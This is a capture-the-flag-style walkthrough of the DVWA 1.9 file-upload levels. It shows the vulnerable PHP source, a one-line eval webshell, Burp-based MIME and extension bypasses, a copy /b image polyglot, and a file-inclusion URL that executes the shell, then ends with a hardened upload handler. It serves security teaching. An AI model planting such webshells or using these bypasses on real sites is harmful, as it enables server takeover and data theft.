Test platform: DVWA 1.9 running in a phpStudy environment
1. Low level
Source code analysis:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
There is no filtering function at this level. Upload a PHP file containing the one-line webshell <?php @eval($_POST["pass"]);?> and connect with China Chopper (菜刀) to obtain the database information. While connecting, capture the request with Burp: when China Chopper connects to DVWA its default cookie corresponds to the impossible level, so intercept the request in Burp and add the cookie information to the request header: Cookie: security=low; PHPSESSID=n693sr05jbtn03nh63ageq57j1. This resolves the connection failure.
2. Medium level
Source code analysis:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
This level only checks the file type reported by the client ($_FILES['uploaded']['type']) and the size, not the file's content or extension. The approach for this upload vulnerability is: first save the one-line PHP webshell with a png extension, intercept the request with Burp Suite before clicking Upload, then change the file extension in Burp to php; the file is then uploaded successfully. Finally, connect with China Chopper.
3. High level
Source code analysis:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    // Returns the file name
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    // Returns the extension (text after the last dot)
    $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Function reference:
• stripos() - finds the position of the first occurrence of a string inside another string (case-insensitive)
• strpos() - finds the position of the first occurrence of a string inside another string (case-sensitive)
• strripos() - finds the position of the last occurrence of a string inside another string (case-insensitive)
• strrpos() - finds the position of the last occurrence of a string inside another string (case-sensitive)
getimagesize() retrieves the size and related information of an image. On success it returns an array; on failure it returns FALSE and raises an E_WARNING. The function determines the size of any GIF, JPG, PNG, SWF, SWC, PSD, TIFF, BMP, IFF, JP2, JPX, JB2, JPC, XBM or WBMP image file and returns the image dimensions together with the file type and the image height and width. Note that it only validates the image header; it says nothing about data appended after the image.
Testing the function in a real environment:
$checkImage=getimagesize($fileTmpName);
var_dump($checkImage);
Output:
array (size=7)
0 => int 1024
1 => int 583
2 => int 2
3 => string 'width="1024" height="583"' (length=25)
'bits' => int 8
'channels' => int 3
'mime' => string 'image/jpeg' (length=10)
Based on the analysis above, append a one-line webshell to the end of a genuine image by running the following command in a cmd window:
copy 11.jpg/b+11.php/a 123.jpg
Upload the generated image to the server and then connect with China Chopper. Connecting to the image directly does not work, because the server does not execute the image webshell; instead, connect through the file inclusion page using the path below:
http://192.168.15.201/DVWA-1.9/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\DVWA-1.9\hackable\uploads\123.jpg
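For comparison, the following is an added example of a hardened upload handler (it is not DVWA's code) that closes each gap the three levels leave open: it detects the MIME type from the file content rather than trusting the client's type field (medium), derives the extension with pathinfo() and requires it to match the detected type (high), and re-encodes the image through GD so that bytes appended after the image data, as produced by the copy /b trick above, are discarded before anything is written. It assumes the form field is still named 'uploaded' and that the storage directory (here /var/uploads, a placeholder) lies outside the web root and is never passed to include().

```php
<?php
// Added example, not part of DVWA. Assumes the 'uploaded' form field and a
// writable storage directory outside the document root (path is a placeholder).
function handleImageUpload(array $file, string $storeDir): string {
    // Only accept files that really arrived through PHP's upload mechanism.
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return 'Your image was not uploaded.';
    }
    if ($file['size'] >= 100000) {
        return 'Your image was not uploaded. File too large.';
    }
    // The medium level trusted $_FILES['type'], which the client sets freely;
    // ask libmagic about the actual bytes instead.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    if (!isset($allowed[$mime])) {
        return 'Your image was not uploaded. We can only accept JPEG or PNG images.';
    }
    // The extension of the original name must agree with the detected content.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if ($ext !== $allowed[$mime] && !($ext === 'jpeg' && $mime === 'image/jpeg')) {
        return 'Your image was not uploaded. Extension does not match content.';
    }
    // getimagesize() proves a valid image header, not that nothing follows it.
    if (getimagesize($file['tmp_name']) === false) {
        return 'Your image was not uploaded. Not a valid image.';
    }
    // Decode and re-encode with GD: the new file contains only pixel data, so
    // anything appended after the image (e.g. by `copy /b`) is dropped.
    $img = ($mime === 'image/jpeg') ? @imagecreatefromjpeg($file['tmp_name'])
                                    : @imagecreatefrompng($file['tmp_name']);
    if ($img === false) {
        return 'Your image was not uploaded. Image could not be decoded.';
    }
    // Server-chosen random name: the client never controls the stored path.
    $dest = rtrim($storeDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $ok = ($mime === 'image/jpeg') ? imagejpeg($img, $dest, 90) : imagepng($img, $dest);
    imagedestroy($img);
    return $ok ? 'Image stored as ' . basename($dest) : 'Your image was not uploaded.';
}

if (isset($_POST['Upload']) && isset($_FILES['uploaded'])) {
    // Files are stored outside the web root and served by a separate read-only
    // handler, so they are never executed or included by the application.
    echo '<pre>' . htmlspecialchars(handleImageUpload($_FILES['uploaded'], '/var/uploads')) . '</pre>';
}
```

Re-encoding also strips metadata such as EXIF and PNG text chunks, which is where payloads are hidden when they are not simply appended; combine it with the random server-side name so that the uploaded file's original name and extension never influence where or as what it is stored.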